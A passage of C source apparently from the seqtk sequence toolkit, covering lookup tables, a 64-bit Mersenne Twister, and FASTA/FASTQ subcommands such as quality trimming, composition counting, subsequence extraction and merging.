15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15 }; unsigned char seq_nt6_table[256] = { 0, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 1, 5, 2, 5, 5, 5, 3, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 1, 5, 2, 5, 5, 5, 3, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5 }; char *seq_nt16_rev_table = "XACMGRSVTWYHKDBN"; unsigned char seq_nt16to4_table[] = { 4, 0, 1, 4, 2, 4, 4, 4, 3, 4, 4, 4, 4, 4, 4, 4 }; unsigned char seq_nt16comp_table[] = { 0, 8, 4, 12, 2, 10, 9, 14, 1, 6, 5, 13, 3, 11, 7, 15 }; int bitcnt_table[] = { 4, 1, 1, 2, 1, 2, 2, 3, 1, 2, 2, 3, 2, 3, 3, 4 }; char comp_tab[] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 'T', 'V', 'G', 'H', 'E', 'F', 'C', 'D', 'I', 'J', 'M', 'L', 'K', 'N', 'O', 'P', 'Q', 'Y', 'S', 'A', 'A', 'B', 'W', 'X', 'R', 'Z', 91, 92, 93, 94, 95, 64, 't', 'v', 'g', 'h', 'e', 'f', 'c', 'd', 'i', 'j', 'm', 'l', 'k', 'n', 'o', 'p', 'q', 'y', 's', 'a', 'a', 'b', 'w', 'x', 'r', 'z', 123, 124, 125, 126, 127 }; static void stk_printstr(FILE *fp, const kstring_t *s, unsigned line_len) { if (line_len != UINT_MAX && line_len != 0) { int i, rest = s->l; for (i = 0; i < s->l; 
		i += line_len, rest -= line_len) {
			/* Emit one wrapped line: full line_len chunks, then the remainder. */
			fputc('\n', fp);
			if (rest > line_len) fwrite(s->s + i, 1, line_len, fp);
			else fwrite(s->s + i, 1, rest, fp);
		}
		fputc('\n', fp);
	} else {
		/* No wrapping requested: print the whole string on one line. */
		fputc('\n', fp);
		fputs(s->s, fp);
		fputc('\n', fp);
	}
}

/*
 * Print one FASTA/FASTQ record.  Chooses '@' vs '>' from whether the record
 * carries quality values; if n >= 0 the sequence is renamed to prefix+n,
 * otherwise the original name is kept.  line_len controls sequence wrapping
 * (see stk_printstr above).
 */
static inline void stk_printseq_renamed(FILE *fp, const kseq_t *s, int line_len, const char *prefix, int64_t n)
{
	fputc(s->qual.l? '@' : '>', fp);
	if (n >= 0) {
		if (prefix) fputs(prefix, fp);
		fprintf(fp, "%lld", (long long)n);
	} else fputs(s->name.s, fp);
	if (s->comment.l) {
		fputc(' ', fp);
		fputs(s->comment.s, fp);
	}
	stk_printstr(fp, &s->seq, line_len);
	if (s->qual.l) {
		/* FASTQ second header line, then wrapped qualities. */
		fputc('+', fp);
		stk_printstr(fp, &s->qual, line_len);
	}
}

/* Convenience wrapper: print a record under its original name. */
static inline void stk_printseq(FILE *fp, const kseq_t *s, int line_len)
{
	stk_printseq_renamed(fp, s, line_len, 0, -1);
}

/* 64-bit Mersenne Twister pseudorandom number generator. Adapted from:

     http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/VERSIONS/C-LANG/mt19937-64.c

   which was written by Takuji Nishimura and Makoto Matsumoto and released
   under the 3-clause BSD license.
*/

typedef uint64_t krint64_t;

struct _krand_t;
typedef struct _krand_t krand_t;

#define KR_NN 312
#define KR_MM 156
#define KR_UM 0xFFFFFFFF80000000ULL /* Most significant 33 bits */
#define KR_LM 0x7FFFFFFFULL /* Least significant 31 bits */

/* PRNG state: KR_NN words of state plus the read cursor mti. */
struct _krand_t {
	int mti;
	krint64_t mt[KR_NN];
};

/* Seed an existing state in place (standard MT19937-64 initialisation). */
static void kr_srand0(krint64_t seed, krand_t *kr)
{
	kr->mt[0] = seed;
	for (kr->mti = 1; kr->mti < KR_NN; ++kr->mti)
		kr->mt[kr->mti] = 6364136223846793005ULL * (kr->mt[kr->mti - 1] ^ (kr->mt[kr->mti - 1] >> 62)) + kr->mti;
}

/* Allocate and seed a new PRNG state.  Caller owns the returned pointer.
 * NOTE(review): the malloc result is not checked before use. */
krand_t *kr_srand(krint64_t seed)
{
	krand_t *kr;
	kr = malloc(sizeof(krand_t));
	kr_srand0(seed, kr);
	return kr;
}

/* Draw the next 64-bit value.  When the state block is exhausted
 * (mti >= KR_NN) the whole block is regenerated, then one word is read and
 * tempered with the standard MT19937-64 shifts/masks. */
krint64_t kr_rand(krand_t *kr)
{
	krint64_t x;
	static const krint64_t mag01[2] = { 0, 0xB5026F5AA96619E9ULL };
	if (kr->mti >= KR_NN) {
		int i;
		if (kr->mti == KR_NN + 1) kr_srand0(5489ULL, kr); /* default seed if never seeded */
		for (i = 0; i < KR_NN - KR_MM; ++i) {
			x = (kr->mt[i] & KR_UM) | (kr->mt[i+1] & KR_LM);
			kr->mt[i] = kr->mt[i + KR_MM] ^ (x>>1) ^ mag01[(int)(x&1)];
		}
		for (; i < KR_NN - 1; ++i) {
			x = (kr->mt[i] & KR_UM) | (kr->mt[i+1] & KR_LM);
			kr->mt[i] = kr->mt[i + (KR_MM - KR_NN)] ^ (x>>1) ^ mag01[(int)(x&1)];
		}
		x = (kr->mt[KR_NN - 1] & KR_UM) | (kr->mt[0] & KR_LM);
		kr->mt[KR_NN - 1] = kr->mt[KR_MM - 1] ^ (x>>1) ^ mag01[(int)(x&1)];
		kr->mti = 0;
	}
	x = kr->mt[kr->mti++];
	x ^= (x >> 29) & 0x5555555555555555ULL;
	x ^= (x << 17) & 0x71D67FFFEDA60000ULL;
	x ^= (x << 37) & 0xFFF7EEE000000000ULL;
	x ^= (x >> 43);
	return x;
}

/* Uniform double in [0,1): top 53 bits scaled by 2^-53. */
#define kr_drand(_kr) ((kr_rand(_kr) >> 11) * (1.0/9007199254740992.0))

/* quality based trimming with Mott's algorithm */
int stk_trimfq(int argc, char *argv[])
{ // FIXME: when a record with zero length will always be treated as a fasta record
	gzFile fp;
	kseq_t *seq;
	double param = 0.05, q_int2real[128];
	int i, c, min_len = 30, left = 0, right = 0, fixed_len = -1;
	/* NOTE(review): usage text below advertises -Q but the optstring here
	 * does not include it — confirm against upstream. */
	while ((c = getopt(argc, argv, "l:q:b:e:L:")) >= 0) {
		switch (c) {
			case 'q': param = atof(optarg); break;
			case 'l': min_len = atoi(optarg); break;
			case 'b': left = atoi(optarg); break;
			case 'e':
right = atoi(optarg); break;
			case 'L': fixed_len = atoi(optarg); break;
		}
	}
	if (optind == argc) {
		fprintf(stderr, "\n");
		fprintf(stderr, "Usage: seqtk trimfq [options] <in.fq>\n\n");
		fprintf(stderr, "Options: -q FLOAT error rate threshold (disabled by -b/-e) [%.2f]\n", param);
		fprintf(stderr, " -l INT maximally trim down to INT bp (disabled by -b/-e) [%d]\n", min_len);
		fprintf(stderr, " -b INT trim INT bp from left (non-zero to disable -q/-l) [0]\n");
		fprintf(stderr, " -e INT trim INT bp from right (non-zero to disable -q/-l) [0]\n");
		fprintf(stderr, " -L INT retain at most INT bp from the 5'-end (non-zero to disable -q/-l) [0]\n");
		fprintf(stderr, " -Q force FASTQ output\n");
		fprintf(stderr, "\n");
		return 1;
	}
	/* "-" means read from stdin; both paths go through zlib so plain and
	 * gzip-compressed input are handled transparently. */
	fp = strcmp(argv[optind], "-")? gzopen(argv[optind], "r") : gzdopen(fileno(stdin), "r");
	if (fp == 0) {
		fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__);
		return 1;
	}
	seq = kseq_init(fp);
	/* Precompute Phred(+33) -> error-probability lookup. */
	for (i = 0; i < 128; ++i)
		q_int2real[i] = pow(10., -(i - 33) / 10.);
	while (kseq_read(seq) >= 0) {
		int beg, tmp, end;
		double s, max;
		if (left || right || fixed_len > 0) {
			/* Positional trimming mode (-b/-e/-L): quality is ignored. */
			beg = left; end = seq->seq.l - right;
			if (beg >= end) beg = end = 0;
			if (fixed_len > 0 && end - beg > fixed_len) end = beg + fixed_len;
		} else if (seq->qual.l > min_len) {
			/* Mott's modified trimming: running sum of (param - p_err),
			 * keeping the window [beg,end) that maximises the sum. */
			for (i = 0, beg = tmp = 0, end = seq->qual.l, s = max = 0.; i < seq->qual.l; ++i) {
				int q = seq->qual.s[i];
				/* Clamp qualities to the ASCII range of the lookup table. */
				if (q < 36) q = 36;
				if (q > 127) q = 127;
				s += param - q_int2real[q];
				if (s > max) max = s, beg = tmp, end = i + 1;
				if (s < 0) s = 0, tmp = i + 1;
			}
			/* max never set; all low qual, just give first min_len bp */
			if (max == 0.) beg = 0, end = min_len;
			if (end - beg < min_len) { // window-based
				/* Fallback: slide a min_len window and keep the one with the
				 * highest total quality. */
				int is, imax;
				for (i = 0, is = 0; i < min_len; ++i) is += seq->qual.s[i] - 33;
				for (imax = is, beg = 0; i < seq->qual.l; ++i) {
					is += (int)seq->qual.s[i] - seq->qual.s[i - min_len];
					if (imax < is) imax = is, beg = i - min_len + 1;
				}
				end = beg + min_len;
			}
		} else beg = 0, end = seq->seq.l; /* FASTA or too-short record: keep whole sequence */
		putchar(seq->is_fastq?
'@' : '>'); fputs(seq->name.s, stdout); if (seq->comment.l) { putchar(' '); puts(seq->comment.s); } else putchar('\n'); fwrite(seq->seq.s + beg, 1, end - beg, stdout); putchar('\n'); if (seq->is_fastq) { puts("+"); fwrite(seq->qual.s + beg, 1, end - beg, stdout); putchar('\n'); } } kseq_destroy(seq); gzclose(fp); return 0; } /* composition */ int stk_comp(int argc, char *argv[]) { gzFile fp; kseq_t *seq; int l, c, upper_only = 0; reghash_t *h = 0; reglist_t dummy; while ((c = getopt(argc, argv, "ur:")) >= 0) { switch (c) { case 'u': upper_only = 1; break; case 'r': h = stk_reg_read(optarg); break; } } if (argc == optind && isatty(fileno(stdin))) { fprintf(stderr, "Usage: seqtk comp [-u] [-r in.bed] <in.fa>\n\n"); fprintf(stderr, "Output format: chr, length, #A, #C, #G, #T, #2, #3, #4, #CpG, #tv, #ts, #CpG-ts\n"); return 1; } fp = optind < argc && strcmp(argv[optind], "-")? gzopen(argv[optind], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); dummy.n= dummy.m = 1; dummy.a = calloc(1, 8); while ((l = kseq_read(seq)) >= 0) { int i, k; reglist_t *p = 0; if (h) { khint_t k = kh_get(reg, h, seq->name.s); if (k != kh_end(h)) p = &kh_val(h, k); } else { p = &dummy; dummy.a[0] = l; } for (k = 0; p && k < p->n; ++k) { int beg = p->a[k]>>32, end = p->a[k]&0xffffffff; int la, lb, lc, na, nb, nc, cnt[11]; if (beg > 0) la = seq->seq.s[beg-1], lb = seq_nt16_table[la], lc = bitcnt_table[lb]; else la = 'a', lb = -1, lc = 0; na = seq->seq.s[beg]; nb = seq_nt16_table[na]; nc = bitcnt_table[nb]; memset(cnt, 0, 11 * sizeof(int)); for (i = beg; i < end; ++i) { int is_CpG = 0, a, b, c; a = na; b = nb; c = nc; na = seq->seq.s[i+1]; nb = seq_nt16_table[na]; nc = bitcnt_table[nb]; if (b == 2 || b == 10) { // C or Y if (nb == 4 || nb == 5) is_CpG = 1; } else if (b == 4 || b == 5) { // G or R if (lb == 2 || lb == 10) is_CpG = 1; } if (upper_only == 0 || isupper(a)) { if (c > 1) 
++cnt[c+2]; if (c == 1) ++cnt[seq_nt16to4_table[b]]; if (b == 10 || b == 5) ++cnt[9]; else if (c == 2) { ++cnt[8]; } if (is_CpG) { ++cnt[7]; if (b == 10 || b == 5) ++cnt[10]; } } la = a; lb = b; lc = c; } if (h) printf("%s\t%d\t%d", seq->name.s, beg, end); else printf("%s\t%d", seq->name.s, l); for (i = 0; i < 11; ++i) printf("\t%d", cnt[i]); putchar('\n'); } fflush(stdout); } free(dummy.a); kseq_destroy(seq); gzclose(fp); return 0; } int stk_randbase(int argc, char *argv[]) { gzFile fp; kseq_t *seq; int l; if (argc == 1) { fprintf(stderr, "Usage: seqtk randbase <in.fa>\n"); return 1; } fp = (strcmp(argv[1], "-") == 0)? gzdopen(fileno(stdin), "r") : gzopen(argv[1], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); while ((l = kseq_read(seq)) >= 0) { int i; printf(">%s", seq->name.s); for (i = 0; i < l; ++i) { int c, b, a, j, k, m; b = seq->seq.s[i]; c = seq_nt16_table[b]; a = bitcnt_table[c]; if (a == 2) { m = (drand48() < 0.5); for (j = k = 0; j < 4; ++j) { if ((1<<j & c) == 0) continue; if (k == m) break; ++k; } seq->seq.s[i] = islower(b)? "acgt"[j] : "ACGT"[j]; } if (i%60 == 0) putchar('\n'); putchar(seq->seq.s[i]); } putchar('\n'); } kseq_destroy(seq); gzclose(fp); return 0; } int stk_hety(int argc, char *argv[]) { gzFile fp; kseq_t *seq; int l, c, win_size = 50000, n_start = 5, win_step, is_lower_mask = 0; char *buf; uint32_t cnt[3]; if (argc == 1) { fprintf(stderr, "\n"); fprintf(stderr, "Usage: seqtk hety [options] <in.fa>\n\n"); fprintf(stderr, "Options: -w INT window size [%d]\n", win_size); fprintf(stderr, " -t INT # start positions in a window [%d]\n", n_start); fprintf(stderr, " -m treat lowercases as masked\n"); fprintf(stderr, "\n"); return 1; } while ((c = getopt(argc, argv, "w:t:m")) >= 0) { switch (c) { case 'w': win_size = atoi(optarg); break; case 't': n_start = atoi(optarg); break; case 'm': is_lower_mask = 1; break; } } fp = (strcmp(argv[optind], "-") == 0)? 
gzdopen(fileno(stdin), "r") : gzopen(argv[optind], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); win_step = win_size / n_start; buf = calloc(win_size, 1); while ((l = kseq_read(seq)) >= 0) { int x, i, y, z, next = 0; cnt[0] = cnt[1] = cnt[2] = 0; for (i = 0; i <= l; ++i) { if ((i >= win_size && i % win_step == 0) || i == l) { if (i == l && l >= win_size) { for (y = l - win_size; y < next; ++y) --cnt[(int)buf[y % win_size]]; } if (cnt[1] + cnt[2] > 0) printf("%s\t%d\t%d\t%.2lf\t%d\t%d\n", seq->name.s, next, i, (double)cnt[2] / (cnt[1] + cnt[2]) * win_size, cnt[1] + cnt[2], cnt[2]); next = i; } if (i < l) { y = i % win_size; c = seq->seq.s[i]; if (is_lower_mask && islower(c)) c = 'N'; c = seq_nt16_table[c]; x = bitcnt_table[c]; if (i >= win_size) --cnt[(int)buf[y]]; buf[y] = z = x > 2? 0 : x == 2? 2 : 1; ++cnt[z]; } } } free(buf); kseq_destroy(seq); gzclose(fp); return 0; } int stk_gap(int argc, char *argv[]) { gzFile fp; kseq_t *seq; int len, c, min_size = 50; if (argc == 1) { fprintf(stderr, "Usage: seqtk gap [-l %d] <in.fa>\n", min_size); return 1; } while ((c = getopt(argc, argv, "l:")) >= 0) { switch (c) { case 'l': min_size = atoi(optarg); break; } } fp = (strcmp(argv[optind], "-") == 0)? gzdopen(fileno(stdin), "r") : gzopen(argv[optind], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); while ((len = kseq_read(seq)) >= 0) { int i, l; for (i = l = 0; i <= len; ++i) { c = i < len? 
seq_nt6_table[(uint8_t)seq->seq.s[i]] : 5; if (i == len || (c >= 1 && c <= 4)) { if (l > 0 && l >= min_size) printf("%s\t%d\t%d\n", seq->name.s, i - l, i); l = 0; } else ++l; } } kseq_destroy(seq); gzclose(fp); return 0; } /* subseq */ int stk_subseq(int argc, char *argv[]) { khash_t(reg) *h = kh_init(reg); gzFile fp; kseq_t *seq; int l, i, j, c, is_tab = 0, line = 0; khint_t k; while ((c = getopt(argc, argv, "tl:")) >= 0) { switch (c) { case 't': is_tab = 1; break; case 'l': line = atoi(optarg); break; } } if (optind + 2 > argc) { fprintf(stderr, "\n"); fprintf(stderr, "Usage: seqtk subseq [options] <in.fa> <in.bed>|<name.list>\n\n"); fprintf(stderr, "Options: -t TAB delimited output\n"); fprintf(stderr, " -l INT sequence line length [%d]\n\n", line); fprintf(stderr, "Note: Use 'samtools faidx' if only a few regions are intended.\n\n"); return 1; } h = stk_reg_read(argv[optind+1]); if (h == 0) { fprintf(stderr, "[E::%s] failed to read the list of regions in file '%s'\n", __func__, argv[optind+1]); return 1; } // subseq fp = strcmp(argv[optind], "-")? gzopen(argv[optind], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream\n", __func__); return 1; } seq = kseq_init(fp); while ((l = kseq_read(seq)) >= 0) { reglist_t *p; k = kh_get(reg, h, seq->name.s); if (k == kh_end(h)) continue; p = &kh_val(h, k); for (i = 0; i < p->n; ++i) { int beg = p->a[i]>>32, end = p->a[i]; if (beg >= seq->seq.l) { fprintf(stderr, "[subseq] %s: %d >= %ld\n", seq->name.s, beg, seq->seq.l); continue; } if (end > seq->seq.l) end = seq->seq.l; if (is_tab == 0) { printf("%c%s", seq->qual.l == seq->seq.l? 
'@' : '>', seq->name.s); if (beg > 0 || (int)p->a[i] != INT_MAX) { if (end == INT_MAX) { if (beg) printf(":%d", beg+1); } else printf(":%d-%d", beg+1, end); } if (seq->comment.l) printf(" %s", seq->comment.s); } else printf("%s\t%d\t", seq->name.s, beg + 1); if (end > seq->seq.l) end = seq->seq.l; for (j = 0; j < end - beg; ++j) { if (is_tab == 0 && (j == 0 || (line > 0 && j % line == 0))) putchar('\n'); putchar(seq->seq.s[j + beg]); } putchar('\n'); if (seq->qual.l != seq->seq.l || is_tab) continue; printf("+"); for (j = 0; j < end - beg; ++j) { if (j == 0 || (line > 0 && j % line == 0)) putchar('\n'); putchar(seq->qual.s[j + beg]); } putchar('\n'); } } // free kseq_destroy(seq); gzclose(fp); stk_reg_destroy(h); return 0; } /* mergefa */ int stk_mergefa(int argc, char *argv[]) { gzFile fp[2]; kseq_t *seq[2]; int i, l, c, is_intersect = 0, is_haploid = 0, qual = 0, is_mask = 0, is_randhet = 0; uint64_t cnt[5]; while ((c = getopt(argc, argv, "himrq:")) >= 0) { switch (c) { case 'i': is_intersect = 1; break; case 'h': is_haploid = 1; break; case 'm': is_mask = 1; break; case 'r': is_randhet = 1; break; case 'q': qual = atoi(optarg); break; } } if (is_mask && is_intersect) { fprintf(stderr, "[%s] `-i' and `-h' cannot be applied at the same time.\n", __func__); return 1; } if (optind + 2 > argc) { fprintf(stderr, "\nUsage: seqtk mergefa [options] <in1.fa> <in2.fa>\n\n"); fprintf(stderr, "Options: -q INT quality threshold [0]\n"); fprintf(stderr, " -i take intersection\n"); fprintf(stderr, " -m convert to lowercase when one of the input base is N\n"); fprintf(stderr, " -r pick a random allele from het\n"); fprintf(stderr, " -h suppress hets in the input\n\n"); return 1; } for (i = 0; i < 2; ++i) { fp[i] = strcmp(argv[optind+i], "-")? 
gzopen(argv[optind+i], "r") : gzdopen(fileno(stdin), "r"); seq[i] = kseq_init(fp[i]); } if (fp[0] == 0 || fp[1] == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } cnt[0] = cnt[1] = cnt[2] = cnt[3] = cnt[4] = 0; srand48(11); while (kseq_read(seq[0]) >= 0) { int min_l, c[2], b[2], is_upper; kseq_read(seq[1]); if (strcmp(seq[0]->name.s, seq[1]->name.s)) fprintf(stderr, "[%s] Different sequence names: %s != %s\n", __func__, seq[0]->name.s, seq[1]->name.s); if (seq[0]->seq.l != seq[1]->seq.l) fprintf(stderr, "[%s] Unequal sequence length: %ld != %ld\n", __func__, seq[0]->seq.l, seq[1]->seq.l); min_l = seq[0]->seq.l < seq[1]->seq.l? seq[0]->seq.l : seq[1]->seq.l; printf(">%s", seq[0]->name.s); for (l = 0; l < min_l; ++l) { c[0] = seq[0]->seq.s[l]; c[1] = seq[1]->seq.s[l]; if (seq[0]->qual.l && seq[0]->qual.s[l] - 33 < qual) c[0] = tolower(c[0]); if (seq[1]->qual.l && seq[1]->qual.s[l] - 33 < qual) c[1] = tolower(c[1]); if (is_intersect) is_upper = (isupper(c[0]) || isupper(c[1]))? 1 : 0; else if (is_mask) is_upper = (isupper(c[0]) || isupper(c[1]))? 1 : 0; else is_upper = (isupper(c[0]) && isupper(c[1]))? 1 : 0; c[0] = seq_nt16_table[c[0]]; c[1] = seq_nt16_table[c[1]]; if (c[0] == 0) c[0] = 15; if (c[1] == 0) c[1] = 15; b[0] = bitcnt_table[c[0]]; b[1] = bitcnt_table[c[1]]; if (is_upper) { if (b[0] == 1 && b[1] == 1) { if (c[0] == c[1]) ++cnt[0]; else ++cnt[1]; } else if (b[0] == 1 && b[1] == 2) ++cnt[2]; else if (b[0] == 2 && b[1] == 1) ++cnt[3]; else if (b[0] == 2 && b[1] == 2) ++cnt[4]; } if (is_haploid && (b[0] > 1 || b[1] > 1)) is_upper = 0; if (is_intersect) { c[0] = c[0] & c[1]; if (c[0] == 0) is_upper = 0; // FIXME: is this a bug - c[0] cannot be 0! 
} else if (is_mask) { if (c[0] == 15 || c[1] == 15) is_upper = 0; c[0] &= c[1]; if (c[0] == 0) is_upper = 0; } else if (is_randhet) { if (b[0] == 1 && b[1] == 1) { // two homs c[0] |= c[1]; } else if (((b[0] == 1 && b[1] == 2) || (b[0] == 2 && b[1] == 1)) && (c[0]&c[1])) { // one hom, one het c[0] = (lrand48()&1)? (c[0] & c[1]) : (c[0] | c[1]); } else if (b[0] == 2 && b[1] == 2 && c[0] == c[1]) { // double hets if (lrand48()&1) { if (lrand48()&1) { for (i = 8; i >= 1; i >>= 1) // pick the "larger" allele if (c[0]&i) c[0] &= i; } else { for (i = 1; i <= 8; i <<= 1) // pick the "smaller" allele if (c[0]&i) c[0] &= i; } } // else set as het } else is_upper = 0; } else c[0] |= c[1]; c[0] = seq_nt16_rev_table[c[0]]; if (!is_upper) c[0] = tolower(c[0]); if (l%60 == 0) putchar('\n'); putchar(c[0]); } putchar('\n'); } fprintf(stderr, "[%s] (same,diff,hom-het,het-hom,het-het)=(%ld,%ld,%ld,%ld,%ld)\n", __func__, (long)cnt[0], (long)cnt[1], (long)cnt[2], (long)cnt[3], (long)cnt[4]); return 0; } int stk_famask(int argc, char *argv[]) { gzFile fp[2]; kseq_t *seq[2]; int i, l, c; while ((c = getopt(argc, argv, "")) >= 0); if (argc - optind < 2) { fprintf(stderr, "Usage: seqtk famask <src.fa> <mask.fa>\n"); return 1; } for (i = 0; i < 2; ++i) { fp[i] = strcmp(argv[optind+i], "-")? gzopen(argv[optind+i], "r") : gzdopen(fileno(stdin), "r"); seq[i] = kseq_init(fp[i]); } if (fp[0] == 0 || fp[1] == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } while (kseq_read(seq[0]) >= 0) { int min_l, c[2]; kseq_read(seq[1]); if (strcmp(seq[0]->name.s, seq[1]->name.s)) fprintf(stderr, "[%s] Different sequence names: %s != %s\n", __func__, seq[0]->name.s, seq[1]->name.s); if (seq[0]->seq.l != seq[1]->seq.l) fprintf(stderr, "[%s] Unequal sequence length: %ld != %ld\n", __func__, seq[0]->seq.l, seq[1]->seq.l); min_l = seq[0]->seq.l < seq[1]->seq.l? 
seq[0]->seq.l : seq[1]->seq.l; printf(">%s", seq[0]->name.s); for (l = 0; l < min_l; ++l) { c[0] = seq[0]->seq.s[l]; c[1] = seq[1]->seq.s[l]; if (c[1] == 'x') c[0] = tolower(c[0]); else if (c[1] != 'X') c[0] = c[1]; if (l%60 == 0) putchar('\n'); putchar(c[0]); } putchar('\n'); } return 0; } int stk_mutfa(int argc, char *argv[]) { khash_t(reg) *h = kh_init(reg); gzFile fp; kseq_t *seq; kstream_t *ks; int l, i, dret; kstring_t *str; khint_t k; if (argc < 3) { fprintf(stderr, "Usage: seqtk mutfa <in.fa> <in.snp>\n\n"); fprintf(stderr, "Note: <in.snp> contains at least four columns per line which are:\n"); fprintf(stderr, " 'chr 1-based-pos any base-changed-to'.\n"); return 1; } // read the list str = calloc(1, sizeof(kstring_t)); fp = strcmp(argv[2], "-")? gzopen(argv[2], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } ks = ks_init(fp); while (ks_getuntil(ks, 0, str, &dret) >= 0) { char *s = strdup(str->s); int beg = 0, ret; reglist_t *p; k = kh_get(reg, h, s); if (k == kh_end(h)) { k = kh_put(reg, h, s, &ret); memset(&kh_val(h, k), 0, sizeof(reglist_t)); } p = &kh_val(h, k); if (ks_getuntil(ks, 0, str, &dret) > 0) beg = atol(str->s) - 1; // 2nd col ks_getuntil(ks, 0, str, &dret); // 3rd col ks_getuntil(ks, 0, str, &dret); // 4th col // skip the rest of the line if (dret != '\n') while ((dret = ks_getc(ks)) > 0 && dret != '\n'); if (isalpha(str->s[0]) && str->l == 1) { if (p->n == p->m) { p->m = p->m? p->m<<1 : 4; p->a = realloc(p->a, p->m * 8); } p->a[p->n++] = (uint64_t)beg<<32 | str->s[0]; } } ks_destroy(ks); gzclose(fp); free(str->s); free(str); // mutfa fp = strcmp(argv[1], "-")? 
gzopen(argv[1], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); while ((l = kseq_read(seq)) >= 0) { reglist_t *p; k = kh_get(reg, h, seq->name.s); if (k != kh_end(h)) { p = &kh_val(h, k); for (i = 0; i < p->n; ++i) { int beg = p->a[i]>>32; if (beg < seq->seq.l) seq->seq.s[beg] = (int)p->a[i]; } } printf(">%s", seq->name.s); for (i = 0; i < l; ++i) { if (i%60 == 0) putchar('\n'); putchar(seq->seq.s[i]); } putchar('\n'); } // free kseq_destroy(seq); gzclose(fp); for (k = 0; k < kh_end(h); ++k) { if (kh_exist(h, k)) { free(kh_val(h, k).a); free((char*)kh_key(h, k)); } } kh_destroy(reg, h); return 0; } int stk_listhet(int argc, char *argv[]) { gzFile fp; kseq_t *seq; int i, l; if (argc == 1) { fprintf(stderr, "Usage: seqtk listhet <in.fa>\n"); return 1; } fp = (strcmp(argv[1], "-") == 0)? gzdopen(fileno(stdin), "r") : gzopen(argv[1], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); while ((l = kseq_read(seq)) >= 0) { for (i = 0; i < l; ++i) { int b = seq->seq.s[i]; if (bitcnt_table[seq_nt16_table[b]] == 2) printf("%s\t%d\t%c\n", seq->name.s, i+1, b); } } kseq_destroy(seq); gzclose(fp); return 0; } int stk_split(int argc, char *argv[]) { gzFile fp; kseq_t *seq; int c, i, l, n = 10, len = 0; char *prefix, *fn; FILE **out; while ((c = getopt(argc, argv, "n:l:")) >= 0) { if (c == 'n') n = atoi(optarg); else if (c == 'l') len = atoi(optarg); } if (argc == optind) { fprintf(stderr, "Usage: seqtk split [options] <prefix> <in.fa>\n"); fprintf(stderr, "Options:\n"); fprintf(stderr, " -n INT number of files [%d]\n", n); fprintf(stderr, " -l INT line length [%d]\n", len); return 1; } prefix = argv[optind]; fp = (strcmp(argv[optind+1], "-") == 0)? 
gzdopen(fileno(stdin), "r") : gzopen(argv[optind+1], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } out = (FILE**)malloc(sizeof(FILE*) * n); fn = (char*)malloc(strlen(prefix) + 10); for (i = 0; i < n; ++i) { sprintf(fn, "%s.%.5d.fa", prefix, i + 1); out[i] = fopen(fn, "w+"); if (out[i] == 0) { fprintf(stderr, "ERROR: failed to create file %s\n", fn); exit(1); } } free(fn); seq = kseq_init(fp); i = 0; while ((l = kseq_read(seq)) >= 0) { stk_printseq(out[i % n], seq, len); ++i; } for (i = 0; i < n; ++i) fclose(out[i]); free(out); kseq_destroy(seq); gzclose(fp); return 0; } /* cutN */ static int cutN_min_N_tract = 1000; static int cutN_nonN_penalty = 10; static int find_next_cut(const kseq_t *ks, int k, int *begin, int *end) { int i, b, e; while (k < ks->seq.l) { if (seq_nt16_table[(int)ks->seq.s[k]] == 15) { int score, max; 